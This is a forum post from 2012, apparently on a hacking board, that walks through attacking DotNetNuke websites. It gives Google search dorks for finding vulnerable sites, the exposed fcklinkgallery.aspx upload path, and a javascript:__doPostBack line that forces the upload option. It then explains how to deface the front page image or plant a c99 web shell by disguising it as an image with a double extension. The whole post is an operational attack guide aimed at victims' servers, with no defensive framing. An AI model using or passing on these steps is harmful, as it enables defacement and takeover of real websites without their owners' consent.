Database
Admin
Posts: 12
Join date: 2012-01-24
 | | Subject: Hacking a website using Dot Net Nuke exploit Wed Jan 25, 2012 12:42 pm | |
| 1. Copy this code to Google and hit enter | Code: | inurl:/tabid/36/language/en-US/Default.aspx |
or
| Code: | inurl:/Fck/fcklinkgallery.aspx |
or use this dork
2. Open the homepage and check is there any image located in /portals/0/ (Check the location of an image)
3. If you find it it means that website is vulnerable and you can change the front page picture. Now the current image name is SHM.jpg. Rename a new image as SHM.jpg which you want to upload. You can also upload s shell.
Here is the explit:
| Code: |
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
|
4. Copy paste it as shown below:
| Code: | www.victim.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx |
5. You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site)
6. After selecting the third option, replace the URL bar with a script below:
| Code: | javascript:__doPostBack('ctlURL$cmdUpload','') |
7. After running this JAVA script, you will see the option for Upload Selected File. Now, select you image file which you have renamed as SHM.jpg and upload it here. Go to main page and refresh.
INSTALLING SHELL
Shell that you are uploading have to be in picture format - jpg, png, btmp... - so, you have to edit your shell.
Rename it like this: c99.php;.jpg and upload it.
|
|
